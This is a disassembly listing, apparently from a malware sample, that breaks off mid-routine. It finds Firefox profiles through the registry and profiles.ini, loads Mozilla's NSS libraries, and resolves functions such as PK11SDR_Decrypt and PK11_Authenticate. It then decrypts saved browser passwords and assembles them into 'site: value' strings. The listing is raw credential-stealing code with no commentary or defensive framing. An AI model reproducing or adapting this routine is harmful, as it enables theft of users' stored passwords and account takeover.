mov dword_67368C, eax
test eax, eax
jg short loc_424654
xor al, al
retn
; ---------------------------------------------------------------------------
loc_424654: ; CODE XREF: sub_42461A+B�j
; sub_42461A+35�j
mov eax, dword_673690
inc dword_673690
mov al, byte_66D3E8[eax]
retn
sub_42461A endp
; =============== S U B R O U T I N E =======================================
sub_424666 proc near ; CODE XREF: sub_424B0B+A9�p
; sub_424B0B+B6�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push esi
push edi
mov edi, [esp+8+arg_0]
xor esi, esi
and byte ptr [edi], 0
loc_424671: ; CODE XREF: sub_424666+1F�j
; sub_424666+25�j ...
call sub_42461A
movsx eax, al
test eax, eax
jz short loc_4246AC
cmp eax, 0Ah
jz short loc_4246A2
cmp eax, 0Dh
jz short loc_424671
xor ecx, ecx
loc_424689: ; CODE XREF: sub_424666+38�j
test al, al
jz short loc_424671
cmp esi, [esp+8+arg_4]
jge short loc_4246AC
mov [esi+edi], al
inc esi
shr eax, 8
inc ecx
cmp ecx, 4
jl short loc_424689
jmp short loc_424671
; ---------------------------------------------------------------------------
loc_4246A2: ; CODE XREF: sub_424666+1A�j
and byte ptr [esi+edi], 0
xor eax, eax
inc eax
loc_4246A9: ; CODE XREF: sub_424666+48�j
pop edi
pop esi
retn
; ---------------------------------------------------------------------------
loc_4246AC: ; CODE XREF: sub_424666+15�j
; sub_424666+2B�j
xor eax, eax
jmp short loc_4246A9
sub_424666 endp
; =============== S U B R O U T I N E =======================================
sub_4246B0 proc near ; CODE XREF: sub_425092+D9�p
; sub_425092+EF�p
arg_0 = dword ptr 4
push [esp+arg_0]
call dword_43706C ; GetFileAttributesA
movzx eax, al
shr eax, 4
and eax, 1
retn
sub_4246B0 endp
; =============== S U B R O U T I N E =======================================
sub_4246C4 proc near ; CODE XREF: sub_424EAB+DF�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
push esi
call sub_4293A0
xor edx, edx
pop ecx
test eax, eax
jle short loc_4246EE
loc_4246D6: ; CODE XREF: sub_4246C4+28�j
mov cl, [edx+esi]
cmp cl, 41h
jl short loc_4246E9
cmp cl, 5Ah
jg short loc_4246E9
add cl, 20h
mov [edx+esi], cl
loc_4246E9: ; CODE XREF: sub_4246C4+18�j
; sub_4246C4+1D�j
inc edx
cmp edx, eax
jl short loc_4246D6
loc_4246EE: ; CODE XREF: sub_4246C4+10�j
pop esi
retn
sub_4246C4 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4246F0 proc near ; CODE XREF: sub_424762+2E�p
; sub_424762+40�p ...
var_1000 = byte ptr -1000h
var_FFF = byte ptr -0FFFh
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
mov eax, 1000h
call sub_429B60
mov al, byte_454A54
push esi
push edi
mov [ebp+var_1000], al
mov ecx, 3FFh
xor eax, eax
lea edi, [ebp+var_FFF]
push [ebp+arg_0]
rep stosd
stosw
stosb
lea eax, [ebp+var_1000]
push eax
call dword_4370B4 ; lstrcpyA
mov esi, dword_437090
lea eax, [ebp+var_1000]
push offset asc_446DF8 ; "/"
push eax
call esi ; dword_437090
push [ebp+arg_4]
lea eax, [ebp+var_1000]
push eax
call esi ; dword_437090
lea eax, [ebp+var_1000]
push eax
call dword_437034 ; LoadLibraryA
pop edi
mov dword_6737C8, eax
pop esi
leave
retn
sub_4246F0 endp
; =============== S U B R O U T I N E =======================================
sub_424762 proc near ; CODE XREF: sub_425092+FE�p
arg_0 = dword ptr 4
push ebx
push ebp
push esi
mov esi, [esp+0Ch+arg_0]
xor ebx, ebx
push edi
cmp esi, ebx
mov dword_6737C4, ebx
mov dword_6737C0, ebx
mov edi, offset aPlc4_dll ; "plc4.dll"
mov ebp, offset aNss3_dll ; "nss3.dll"
jz loc_424854
push offset aMozcrt19_dll ; "mozcrt19.dll"
push esi
call sub_4246F0
pop ecx
mov ebx, offset aNspr4_dll ; "nspr4.dll"
test eax, eax
pop ecx
jz short loc_4247E9
push ebx
push esi
call sub_4246F0
pop ecx
test eax, eax
pop ecx
jz short loc_4247E9
push offset aPlds4_dll ; "plds4.dll"
push esi
call sub_4246F0
pop ecx
test eax, eax
pop ecx
jz short loc_4247E9
push edi
push esi
call sub_4246F0
pop ecx
test eax, eax
pop ecx
jz short loc_4247E9
push offset aNssutil3_dll ; "nssutil3.dll"
push esi
call sub_4246F0
pop ecx
test eax, eax
pop ecx
jz short loc_4247E9
push offset aSqlite3_dll ; "sqlite3.dll"
push esi
call sub_4246F0
pop ecx
pop ecx
loc_4247E9: ; CODE XREF: sub_424762+3C�j
; sub_424762+49�j ...
push ebx
push esi
call sub_4246F0
pop ecx
test eax, eax
pop ecx
jz short loc_42484A
push offset aPlds4_dll ; "plds4.dll"
push esi
call sub_4246F0
pop ecx
test eax, eax
pop ecx
jz short loc_42484A
push edi
push esi
call sub_4246F0
pop ecx
mov dword_6737C4, eax
test eax, eax
pop ecx
jz short loc_42484A
push edi
push esi
call sub_4246F0
pop ecx
mov dword_6737C4, eax
test eax, eax
pop ecx
jz short loc_42484A
push offset aSoftokn3_dll ; "softokn3.dll"
push esi
call sub_4246F0
pop ecx
test eax, eax
pop ecx
jz short loc_42484A
push ebp
push esi
call sub_4246F0
pop ecx
mov dword_6737C0, eax
pop ecx
loc_42484A: ; CODE XREF: sub_424762+92�j
; sub_424762+A3�j ...
xor ebx, ebx
cmp dword_6737C0, ebx
jnz short loc_42487E
loc_424854: ; CODE XREF: sub_424762+22�j
mov esi, dword_437034
push ebp
call esi ; dword_437034
push edi
mov dword_6737C0, eax
call esi ; dword_437034
cmp dword_6737C0, ebx
mov dword_6737C4, eax
jz loc_424956
cmp eax, ebx
jz loc_424956
loc_42487E: ; CODE XREF: sub_424762+F0�j
mov esi, dword_437030
push offset aNss_init ; "NSS_Init"
push dword_6737C0
call esi ; dword_437030
push offset aNss_shutdown ; "NSS_Shutdown"
mov dword_67379C, eax
push dword_6737C0
call esi ; dword_437030
push offset aPk11_getintern ; "PK11_GetInternalKeySlot"
mov dword_6737A0, eax
push dword_6737C0
call esi ; dword_437030
push offset aPk11_freeslot ; "PK11_FreeSlot"
mov dword_6737A4, eax
push dword_6737C0
call esi ; dword_437030
push offset aPk11_authentic ; "PK11_Authenticate"
mov dword_6737AC, eax
push dword_6737C0
call esi ; dword_437030
push offset aPk11sdr_decryp ; "PK11SDR_Decrypt"
mov dword_6737B0, eax
push dword_6737C0
call esi ; dword_437030
push offset aPk11_checkuser ; "PK11_CheckUserPassword"
mov dword_6737B4, eax
push dword_6737C0
call esi ; dword_437030
cmp dword_67379C, ebx
mov dword_6737A8, eax
jz short loc_424951
cmp dword_6737A0, ebx
jz short loc_424951
cmp dword_6737A4, ebx
jz short loc_424951
cmp dword_6737B0, ebx
jz short loc_424951
cmp dword_6737B4, ebx
jz short loc_424951
cmp dword_6737AC, ebx
jz short loc_424951
cmp eax, ebx
jz short loc_424951
push offset aPl_base64decod ; "PL_Base64Decode"
push dword_6737C4
call esi ; dword_437030
cmp eax, ebx
mov dword_6737B8, eax
jz short loc_424951
xor eax, eax
inc eax
jmp short loc_424958
; ---------------------------------------------------------------------------
loc_424951: ; CODE XREF: sub_424762+1A6�j
; sub_424762+1AE�j ...
call sub_424984
loc_424956: ; CODE XREF: sub_424762+10E�j
; sub_424762+116�j
xor eax, eax
loc_424958: ; CODE XREF: sub_424762+1ED�j
pop edi
pop esi
pop ebp
pop ebx
retn
sub_424762 endp
; =============== S U B R O U T I N E =======================================
sub_42495D proc near ; CODE XREF: sub_425092+109�p
arg_0 = dword ptr 4
push [esp+arg_0]
and dword_6737BC, 0
call dword_67379C
test eax, eax
pop ecx
jz short loc_42497B
call sub_424984
xor eax, eax
retn
; ---------------------------------------------------------------------------
loc_42497B: ; CODE XREF: sub_42495D+14�j
xor eax, eax
inc eax
mov dword_6737BC, eax
retn
sub_42495D endp
; =============== S U B R O U T I N E =======================================
sub_424984 proc near ; CODE XREF: sub_424762:loc_424951�p
; sub_42495D+16�p
cmp dword_6737BC, 0
jz short loc_424998
mov eax, dword_6737A0
test eax, eax
jz short loc_424998
call eax ; dword_6737A0
loc_424998: ; CODE XREF: sub_424984+7�j
; sub_424984+10�j
mov eax, dword_6737C0
push esi
mov esi, dword_437038
test eax, eax
jz short loc_4249AB
push eax
call esi ; dword_437038
loc_4249AB: ; CODE XREF: sub_424984+22�j
mov eax, dword_6737C4
test eax, eax
jz short loc_4249B7
push eax
call esi ; dword_437038
loc_4249B7: ; CODE XREF: sub_424984+2E�j
pop esi
retn
sub_424984 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4249B9 proc near ; CODE XREF: sub_424B0B+189�p
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 10h
mov eax, [ebp+arg_0]
push ebx
xor ebx, ebx
lea ecx, [ebp+var_10]
cmp [eax], bl
push esi
mov [ebp+var_10], ebx
mov [ebp+var_4], ebx
mov [ebp+var_8], ebx
mov [ebp+var_C], ebx
push ecx
jz short loc_424A43
lea ecx, [ebp+var_8]
push ecx
push eax
call sub_424A59
add esp, 0Ch
test eax, eax
jz short loc_424A3F
cmp [ebp+var_8], ebx
jz short loc_424A3F
lea eax, [ebp+var_4]
push eax
lea eax, [ebp+var_C]
push eax
push [ebp+var_10]
push [ebp+var_8]
call sub_424AAC
add esp, 10h
test eax, eax
jz short loc_424A3F
cmp [ebp+var_C], ebx
jz short loc_424A3F
mov eax, [ebp+var_4]
inc eax
push eax
call sub_4297B8
mov esi, [ebp+arg_4]
cmp eax, ebx
pop ecx
mov [esi], eax
jz short loc_424A3F
push [ebp+var_4]
push [ebp+var_C]
push eax
call sub_429420
mov eax, [esi]
mov ecx, [ebp+var_4]
add esp, 0Ch
mov [ecx+eax], bl
xor eax, eax
inc eax
jmp short loc_424A55
; ---------------------------------------------------------------------------
loc_424A3F: ; CODE XREF: sub_4249B9+30�j
; sub_4249B9+35�j ...
xor eax, eax
jmp short loc_424A55
; ---------------------------------------------------------------------------
loc_424A43: ; CODE XREF: sub_4249B9+1F�j
push [ebp+arg_4]
push eax
call sub_424A59
add esp, 0Ch
neg eax
sbb eax, eax
neg eax
loc_424A55: ; CODE XREF: sub_4249B9+84�j
; sub_4249B9+88�j
pop esi
pop ebx
leave
retn
sub_4249B9 endp
; =============== S U B R O U T I N E =======================================
sub_424A59 proc near ; CODE XREF: sub_4249B9+26�p
; sub_4249B9+8E�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push ebx
push esi
push edi
mov edi, [esp+0Ch+arg_0]
push edi
call sub_4293A0
mov esi, eax
xor ebx, ebx
pop ecx
cmp byte ptr [esi+edi-1], 3Dh
jnz short loc_424A7D
inc ebx
cmp byte ptr [esi+edi-2], 3Dh
jnz short loc_424A7D
push 2
pop ebx
loc_424A7D: ; CODE XREF: sub_424A59+17�j
; sub_424A59+1F�j
push 0
push esi
push edi
call dword_6737B8
mov ecx, [esp+18h+arg_4]
add esp, 0Ch
test eax, eax
mov [ecx], eax
jz short loc_424AA8
lea eax, [esi+esi*2]
push 4
cdq
pop ecx
idiv ecx
mov ecx, [esp+0Ch+arg_8]
sub eax, ebx
mov [ecx], eax
xor eax, eax
inc eax
loc_424AA8: ; CODE XREF: sub_424A59+39�j
pop edi
pop esi
pop ebx
retn
sub_424A59 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_424AAC proc near ; CODE XREF: sub_4249B9+45�p
var_18 = byte ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = byte ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 18h
push esi
call dword_6737A4
mov esi, eax
xor eax, eax
cmp esi, eax
jz short loc_424AE9
mov ecx, [ebp+arg_0]
mov [ebp+var_8], eax
mov [ebp+var_4], eax
push eax
lea eax, [ebp+var_C]
mov [ebp+var_14], ecx
mov ecx, [ebp+arg_4]
push eax
lea eax, [ebp+var_18]
mov [ebp+var_10], ecx
push eax
call dword_6737B4
add esp, 0Ch
test eax, eax
jz short loc_424AED
loc_424AE9: ; CODE XREF: sub_424AAC+13�j
xor eax, eax
jmp short loc_424B08
; ---------------------------------------------------------------------------
loc_424AED: ; CODE XREF: sub_424AAC+3B�j
mov eax, [ebp+arg_8]
mov ecx, [ebp+var_8]
push esi
mov [eax], ecx
mov eax, [ebp+arg_C]
mov ecx, [ebp+var_4]
mov [eax], ecx
call dword_6737AC
xor eax, eax
pop ecx
inc eax
loc_424B08: ; CODE XREF: sub_424AAC+3F�j
pop esi
leave
retn
sub_424AAC endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_424B0B proc near ; CODE XREF: sub_425092+131�p
; sub_425092+154�p ...
var_A008 = byte ptr -0A008h
var_7808 = byte ptr -7808h
var_5008 = byte ptr -5008h
var_2808 = byte ptr -2808h
var_2807 = byte ptr -2807h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
push ebp
mov ebp, esp
mov eax, 0A008h
call sub_429B60
push ebx
push esi
mov esi, [ebp+arg_4]
xor eax, eax
cmp esi, offset dword_4503CC
mov [ebp+var_8], eax
mov [ebp+var_4], eax
jnz short loc_424B34
mov [ebp+var_4], 1
loc_424B34: ; CODE XREF: sub_424B0B+20�j
cmp esi, offset dword_4503BC
jnz short loc_424B43
mov [ebp+var_4], 2
loc_424B43: ; CODE XREF: sub_424B0B+2F�j
cmp esi, offset dword_4503AC
jnz short loc_424B52
mov [ebp+var_4], 3
loc_424B52: ; CODE XREF: sub_424B0B+3E�j
cmp [ebp+arg_0], eax
jz loc_424D5F
cmp esi, eax
jz loc_424D5F
push [ebp+arg_0]
lea eax, [ebp+var_5008]
push eax
call dword_4370B4 ; lstrcpyA
mov ebx, dword_437090
lea eax, [ebp+var_5008]
push offset asc_44DABC ; "\\"
push eax
call ebx ; dword_437090
lea eax, [ebp+var_5008]
push esi
push eax
call ebx ; dword_437090
lea eax, [ebp+var_5008]
push eax
call sub_4245ED
test eax, eax
pop ecx
jz loc_424D5F
push edi
mov edi, 2800h
lea eax, [ebp+var_2808]
push edi
push eax
call sub_424666
lea eax, [ebp+var_2808]
push edi
push eax
call sub_424666
add esp, 10h
jmp short loc_424BF4
; ---------------------------------------------------------------------------
loc_424BCB: ; CODE XREF: sub_424B0B+EB�j
lea eax, [ebp+var_2808]
push eax
call sub_4293A0
test eax, eax
pop ecx
jz short loc_424BE5
cmp [ebp+var_2808], 2Eh
jz short loc_424BF8
loc_424BE5: ; CODE XREF: sub_424B0B+CF�j
lea eax, [ebp+var_2808]
push edi
push eax
call sub_424666
pop ecx
pop ecx
loc_424BF4: ; CODE XREF: sub_424B0B+BE�j
test eax, eax
jnz short loc_424BCB
loc_424BF8: ; CODE XREF: sub_424B0B+D8�j
lea eax, [ebp+var_2808]
push edi
push eax
call sub_424666
pop ecx
test eax, eax
pop ecx
jz loc_424D59
mov esi, offset aS_5 ; "%s"
loc_424C14: ; CODE XREF: sub_424B0B:loc_424D53�j
lea eax, [ebp+var_2808]
push eax
lea eax, [ebp+var_7808]
push [ebp+var_4]
push offset a6atss0dycwf_6n ; "6atSs0dyCWF.6N5aw.affEY1"
push offset dword_45038C
push edi
push eax
call sub_429BBE
lea eax, [ebp+var_2808]
push edi
push eax
call sub_424666
add esp, 20h
jmp loc_424CEB
; ---------------------------------------------------------------------------
loc_424C4A: ; CODE XREF: sub_424B0B+1E2�j
cmp [ebp+var_2808], 2Eh
jz loc_424CF3
cmp [ebp+var_2808], 2Ah
lea eax, [ebp+var_2807]
jz short loc_424C6C
lea eax, [ebp+var_2808]
loc_424C6C: ; CODE XREF: sub_424B0B+159�j
push eax
lea eax, [ebp+var_A008]
push eax
call dword_4370B4 ; lstrcpyA
lea eax, [ebp+var_2808]
push edi
push eax
call sub_424666
pop ecx
lea eax, [ebp+var_8]
pop ecx
push eax
lea eax, [ebp+var_2808]
push eax
call sub_4249B9
pop ecx
cmp eax, 1
pop ecx
jnz short loc_424CDC
lea eax, [ebp+var_A008]
push eax
lea eax, [ebp+var_7808]
push eax
call ebx ; dword_437090
lea eax, [ebp+var_7808]
push offset asc_450388 ; ": "
push eax
call ebx ; dword_437090
push [ebp+var_8]
lea eax, [ebp+var_7808]
push eax
call ebx ; dword_437090
lea eax, [ebp+var_7808]
push offset asc_43D938 ; " "
push eax
call ebx ; dword_437090
and [ebp+var_8], 0
loc_424CDC: ; CODE XREF: sub_424B0B+193�j
lea eax, [ebp+var_2808]
push edi
push eax
call sub_424666
pop ecx
pop ecx
loc_424CEB: ; CODE XREF: sub_424B0B+13A�j
test eax, eax
jnz loc_424C4A
loc_424CF3: ; CODE XREF: sub_424B0B+146�j
lea eax, [ebp+var_7808]
cmp [ebp+arg_10], 0
push eax
push esi
push [ebp+arg_14]
push [ebp+arg_8]
push [ebp+arg_C]
jnz short loc_424D11
call sub_41CF4C
jmp short loc_424D16
; ---------------------------------------------------------------------------
loc_424D11: ; CODE XREF: sub_424B0B+1FD�j
call sub_41CFE0
loc_424D16: ; CODE XREF: sub_424B0B+204�j
add esp, 14h
cmp [ebp+arg_18], 0
jnz short loc_424D42
cmp [ebp+arg_10], 0
lea eax, [ebp+var_7808]
push eax
push esi
push [ebp+arg_8]
push [ebp+arg_C]
jnz short loc_424D3A
call sub_41CE4A
jmp short loc_424D3F
; ---------------------------------------------------------------------------
loc_424D3A: ; CODE XREF: sub_424B0B+226�j
call sub_41CDD4
loc_424D3F: ; CODE XREF: sub_424B0B+22D�j
add esp, 10h
loc_424D42: ; CODE XREF: sub_424B0B+212�j
lea eax, [ebp+var_2808]
push edi
push eax
call sub_424666
pop ecx
test eax, eax
pop ecx
loc_424D53: ; DATA XREF: .text:0043DA6C�o
jnz loc_424C14
loc_424D59: ; CODE XREF: sub_424B0B+FE�j
xor eax, eax
pop edi
inc eax
jmp short loc_424D61
; ---------------------------------------------------------------------------
loc_424D5F: ; CODE XREF: sub_424B0B+4A�j
; sub_424B0B+52�j ...
xor eax, eax
loc_424D61: ; CODE XREF: sub_424B0B+252�j
pop esi
pop ebx
leave
retn
sub_424B0B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_424D65 proc near ; CODE XREF: sub_425092+E7�p
var_154 = byte ptr -154h
var_110 = byte ptr -110h
var_10F = byte ptr -10Fh
var_C = byte ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 154h
push ebx
push esi
push edi
push 10h
pop ecx
mov esi, offset aSoftwareClient ; "SOFTWARE\\Clients\\StartMenuInternet\\fire"...
lea edi, [ebp+var_154]
mov al, byte_454A54
rep movsd
movsw
push 40h
mov [ebp+var_110], al
pop ecx
xor eax, eax
lea edi, [ebp+var_10F]
xor ebx, ebx
rep stosd
stosw
stosb
lea eax, [ebp+var_4]
mov [ebp+var_8], 104h
push eax
push 20019h
lea eax, [ebp+var_154]
push ebx
push eax
push 80000002h
call dword_437004 ; RegOpenKeyExA
test eax, eax
jnz loc_424EA4
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_110]
push eax
lea eax, [ebp+var_C]
push eax
push ebx
push ebx
push [ebp+var_4]
call dword_437028 ; RegQueryValueExA
test eax, eax
jnz loc_424E9B
cmp [ebp+var_8], ebx
jbe loc_424E9B
cmp [ebp+var_110], bl
jz loc_424E9B
push [ebp+var_4]
call dword_437000 ; RegCloseKey
cmp [ebp+var_110], 22h
jnz short loc_424E47
lea eax, [ebp+var_110]
xor esi, esi
push eax
call sub_4293A0
dec eax
pop ecx
jz short loc_424E47
loc_424E26: ; CODE XREF: sub_424D65+E0�j
mov al, [ebp+esi+var_10F]
mov [ebp+esi+var_110], al
lea eax, [ebp+var_110]
push eax
inc esi
call sub_4293A0
dec eax
pop ecx
cmp esi, eax
jb short loc_424E26
loc_424E47: ; CODE XREF: sub_424D65+AD�j
; sub_424D65+BF�j
lea eax, [ebp+var_110]
push eax
call sub_4293A0
pop ecx
jmp short loc_424E60
; ---------------------------------------------------------------------------
loc_424E56: ; CODE XREF: sub_424D65+FE�j
cmp [ebp+eax+var_110], 5Ch
jz short loc_424E67
loc_424E60: ; CODE XREF: sub_424D65+EF�j
dec eax
cmp eax, ebx
jg short loc_424E56
jmp short loc_424E6E
; ---------------------------------------------------------------------------
loc_424E67: ; CODE XREF: sub_424D65+F9�j
mov [ebp+eax+var_110], bl
loc_424E6E: ; CODE XREF: sub_424D65+100�j
lea eax, [ebp+var_110]
push eax
call sub_4293A0
inc eax
push eax
call sub_4297B8
mov esi, eax
pop ecx
cmp esi, ebx
pop ecx
jz short loc_424E97
lea eax, [ebp+var_110]
push eax
push esi
call dword_4370B4 ; lstrcpyA
loc_424E97: ; CODE XREF: sub_424D65+122�j
mov eax, esi
jmp short loc_424EA6
; ---------------------------------------------------------------------------
loc_424E9B: ; CODE XREF: sub_424D65+82�j
; sub_424D65+8B�j ...
push [ebp+var_4]
call dword_437000 ; RegCloseKey
loc_424EA4: ; CODE XREF: sub_424D65+60�j
xor eax, eax
loc_424EA6: ; CODE XREF: sub_424D65+134�j
pop edi
pop esi
pop ebx
leave
retn
sub_424D65 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_424EAB proc near ; CODE XREF: sub_425092:loc_425163�p
var_64C = dword ptr -64Ch
var_63D = byte ptr -63Dh
var_63C = byte ptr -63Ch
var_23C = byte ptr -23Ch
var_138 = byte ptr -138h
var_137 = byte ptr -137h
var_34 = byte ptr -34h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 63Ch
mov al, byte_454A54
push ebx
push esi
push edi
push 40h
mov [ebp+var_138], al
pop ecx
xor eax, eax
lea edi, [ebp+var_137]
push 8
rep stosd
stosw
stosb
pop ecx
mov esi, offset aApplicationDat ; "Application Data\\Mozilla\\Firefox"
lea edi, [ebp+var_34]
lea eax, [ebp+var_C]
rep movsd
xor ebx, ebx
push eax
push 8
mov [ebp+var_10], 104h
movsb
mov [ebp+var_4], ebx
call dword_43704C ; GetCurrentProcess
push eax
call dword_437010 ; OpenProcessToken
test eax, eax
jz short loc_424F79
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_138]
push eax
push [ebp+var_C]
call dword_437280
test eax, eax
jz short loc_424F79
lea eax, [ebp+var_138]
push eax
lea eax, [ebp+var_23C]
push eax
call dword_4370B4 ; lstrcpyA
mov esi, dword_437090
mov edi, offset asc_44DABC ; "\\"
lea eax, [ebp+var_23C]
push edi
push eax
call esi ; dword_437090
lea eax, [ebp+var_34]
push eax
lea eax, [ebp+var_23C]
push eax
call esi ; dword_437090
lea eax, [ebp+var_23C]
push offset aProfiles_ini ; "\\profiles.ini"
push eax
call esi ; dword_437090
lea eax, [ebp+var_23C]
push offset word_43EF70
push eax
call sub_42A50C
pop ecx
mov [ebp+var_8], eax
test eax, eax
pop ecx
jnz short loc_424F80
loc_424F79: ; CODE XREF: sub_424EAB+56�j
; sub_424EAB+6E�j
xor eax, eax
jmp loc_42508D
; ---------------------------------------------------------------------------
loc_424F80: ; CODE XREF: sub_424EAB+CC�j
push eax
jmp short loc_424FCA
; ---------------------------------------------------------------------------
loc_424F83: ; CODE XREF: sub_424EAB+135�j
lea eax, [ebp+var_63C]
push eax
call sub_4246C4
cmp [ebp+var_4], 0
pop ecx
lea eax, [ebp+var_63C]
jnz short loc_424FB6
push offset aNameDefault ; "name=default"
push eax
call sub_42AEA0
pop ecx
test eax, eax
pop ecx
jz short loc_424FC7
mov [ebp+var_4], 1
jmp short loc_424FC7
; ---------------------------------------------------------------------------
loc_424FB6: ; CODE XREF: sub_424EAB+EF�j
push offset aPath_0 ; "path="
push eax
call sub_42AEA0
pop ecx
test eax, eax
pop ecx
jnz short loc_424FE7
loc_424FC7: ; CODE XREF: sub_424EAB+100�j
; sub_424EAB+109�j
push [ebp+var_8]
loc_424FCA: ; CODE XREF: sub_424EAB+D6�j
lea eax, [ebp+var_63C]
push 400h
push eax
call sub_42B087
add esp, 0Ch
test eax, eax
jnz short loc_424F83
jmp loc_425082
; ---------------------------------------------------------------------------
loc_424FE7: ; CODE XREF: sub_424EAB+11A�j
lea eax, [ebp+var_63C]
push offset asc_446DF8 ; "/"
push eax
call sub_42AEA0
pop ecx
test eax, eax
pop ecx
jz short loc_425001
mov byte ptr [eax], 5Ch
loc_425001: ; CODE XREF: sub_424EAB+151�j
lea eax, [ebp+var_63C]
push eax
call sub_4293A0
and [ebp+eax+var_63D], 0
lea eax, [ebp+var_63C]
mov [esp+64Ch+var_64C], offset asc_44736C ; "="
push eax
call sub_42AEA0
push eax
mov [ebp+var_4], eax
call sub_4293A0
mov ebx, eax
lea eax, [ebp+var_34]
push eax
call sub_4293A0
add ebx, eax
lea eax, [ebp+var_138]
push eax
call sub_4293A0
lea eax, [ebx+eax+3]
push eax
call sub_4297B8
mov ebx, eax
add esp, 18h
test ebx, ebx
jz short loc_425082
lea eax, [ebp+var_138]
push eax
push ebx
call dword_4370B4 ; lstrcpyA
push edi
push ebx
call esi ; dword_437090
lea eax, [ebp+var_34]
push eax
push ebx
call esi ; dword_437090
push edi
push ebx
call esi ; dword_437090
mov eax, [ebp+var_4]
inc eax
push eax
push ebx
call esi ; dword_437090
loc_425082: ; CODE XREF: sub_424EAB+137�j
; sub_424EAB+1B0�j
push [ebp+var_8]
call sub_42A10B
pop ecx
mov eax, ebx
loc_42508D: ; CODE XREF: sub_424EAB+D0�j
pop edi
pop esi
pop ebx
leave
retn
sub_424EAB endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_425092 proc near ; DATA XREF: sub_40A9FE+1389�o
var_28E4 = byte ptr -28E4h
var_1D4 = byte ptr -1D4h
var_D0 = dword ptr -0D0h
var_CC = byte ptr -0CCh
var_48 = dword ptr -48h
var_18 = dword ptr -18h
var_C = byte ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 28E4h
call sub_429B60
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
push 31h
mov esi, eax
pop ecx
lea edi, [ebp+var_D0]
rep movsd
mov esi, dword_437004
mov dword ptr [eax+0BCh], 1
and [ebp+var_8], 0
lea eax, [ebp+arg_0]
mov ebx, 20019h
push eax
push ebx
push 0
mov edi, 80000002h
push offset aSoftwareMozill ; "SOFTWARE\\Mozilla\\Mozilla Firefox"
push edi
mov [ebp+var_4], 104h
call esi ; dword_437004
test eax, eax
jz short loc_425101
lea eax, [ebp+arg_0]
push eax
push ebx
push 0
push offset aSoftwareMozi_0 ; "SOFTWARE\\mozilla.org\\Mozilla"
push edi
call esi ; dword_437004
test eax, eax
jnz loc_425216
loc_425101: ; CODE XREF: sub_425092+56�j
lea eax, [ebp+var_4]
push eax
lea eax, [ebp+var_1D4]
push eax
lea eax, [ebp+var_C]
push eax
push 0
push offset aCurrentversion ; "CurrentVersion"
push [ebp+arg_0]
call dword_437028 ; RegQueryValueExA
test eax, eax
jnz short loc_42513E
cmp [ebp+var_4], eax
ja short loc_425135
cmp [ebp+var_1D4], al
jz loc_425216
loc_425135: ; CODE XREF: sub_425092+95�j
push [ebp+arg_0]
call dword_437000 ; RegCloseKey
loc_42513E: ; CODE XREF: sub_425092+90�j
cmp [ebp+var_48], 0
jz short loc_425160
push 2710h
lea eax, [ebp+var_28E4]
push [ebp+var_48]
xor edi, edi
inc edi
push eax
call sub_429D10
add esp, 0Ch
jmp short loc_425163
; ---------------------------------------------------------------------------
loc_425160: ; CODE XREF: sub_425092+B0�j
mov edi, [ebp+var_8]
loc_425163: ; CODE XREF: sub_425092+CC�j
call sub_424EAB
mov esi, eax
push esi
call sub_4246B0
test eax, eax
pop ecx
jz loc_425216
call sub_424D65
mov ebx, eax
push ebx
call sub_4246B0
test eax, eax
pop ecx
jz loc_425216
push ebx
call sub_424762
test eax, eax
pop ecx
jz short loc_425211
push esi
call sub_42495D
test eax, eax
pop ecx
jz short loc_425211
lea eax, [ebp+var_28E4]
push edi
push eax
lea eax, [ebp+var_CC]
push [ebp+var_18]
push [ebp+var_D0]
push eax
push offset dword_4503CC
push esi
call sub_424B0B
lea eax, [ebp+var_28E4]
push edi
push eax
lea eax, [ebp+var_CC]
push [ebp+var_18]
push [ebp+var_D0]
push eax
push offset dword_4503BC
push esi
call sub_424B0B
lea eax, [ebp+var_28E4]
push edi
push eax
lea eax, [ebp+var_CC]
push [ebp+var_18]
push [ebp+var_D0]
push eax
push offset dword_4503AC
push esi
call sub_424B0B
add esp, 54h
loc_425211: ; CODE XREF: sub_425092+106�j
; sub_425092+111�j
xor eax, eax
inc eax
jmp short loc_425218
; ---------------------------------------------------------------------------
loc_425216: ; CODE XREF: sub_425092+69�j
; sub_425092+9D�j ...
xor eax, eax
loc_425218: ; CODE XREF: sub_425092+182�j
pop edi
pop esi
pop ebx
leave
retn 4
sub_425092 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42521F proc near ; DATA XREF: sub_40A9FE+1197�o
var_794 = byte ptr -794h
var_394 = byte ptr -394h
